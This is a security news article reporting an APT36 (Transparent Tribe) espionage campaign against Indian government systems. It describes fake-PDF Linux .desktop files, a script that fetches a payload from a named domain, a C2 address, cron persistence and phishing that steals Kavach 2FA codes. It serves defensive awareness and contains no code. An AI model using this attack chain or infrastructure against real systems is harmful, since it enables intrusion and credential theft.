A sophisticated cyber-espionage campaign linked to the Pakistani-origin threat group Transparent Tribe (APT36) has been uncovered, targeting Indian government systems with weaponized desktop shortcut files. Security researchers warn that the group’s latest operations demonstrate an evolving ability to compromise both Windows and BOSS (Bharat Operating System Solutions) Linux platforms.
Dual-Platform Attacks with Phishing Emails
According to cybersecurity firm CYFIRMA, the intrusion begins with spear-phishing emails disguised as meeting notices. These emails deliver malicious Linux .desktop shortcut files that mimic PDF documents, such as Meeting_Ltr_ID1543ops.pdf.desktop. Once executed, the files trigger a shell script designed to fetch a hex-encoded payload from an attacker-controlled domain, securestore[.]cv, and deploy it as an ELF binary.
Data Protection and DPDP Act Readiness: Hundreds of Senior Leaders Sign Up for CDPO Program
Simultaneously, a decoy PDF stored on Google Drive is opened via Firefox to maintain the illusion of legitimacy. The malware then connects with a hard-coded command-and-control (C2) server, modgovindia[.]space:4000, enabling the adversaries to issue commands, exfiltrate data, and download additional payloads. Persistence is achieved through cron jobs, ensuring continued access even after system reboots.
CloudSEK researchers, who independently verified the activity, highlighted the use of advanced anti-debugging and sandbox evasion checks designed to frustrate forensic analysis. The malware eventually deploys Poseidon, a backdoor linked to Transparent Tribe, capable of reconnaissance, credential theft, and long-term surveillance of sensitive government infrastructure.
Continued Targeting of Kavach Authentication
The campaign builds on Transparent Tribe’s recent attacks on Indian defence entities, where spoofed domains were used to steal credentials and bypass Kavach, the two-factor authentication (2FA) system employed by government agencies. Victims entering their official email IDs were redirected to phishing pages that prompted for passwords and Kavach codes, enabling attackers to hijack secure accounts.
CYFIRMA noted that the use of typo-squatted domains and Pakistan-hosted infrastructure is consistent with the group’s long-standing tactics. Hunt.io’s parallel research has linked similar spear-phishing operations to SideCopy, a sub-cluster of Transparent Tribe, with activity extending to Bangladesh, Nepal, Sri Lanka, and Turkey.
These revelations underscore the growing identity security risks posed by South Asian APT groups, which continue to exploit social engineering, phishing, and infrastructure mimicry to breach critical national institutions.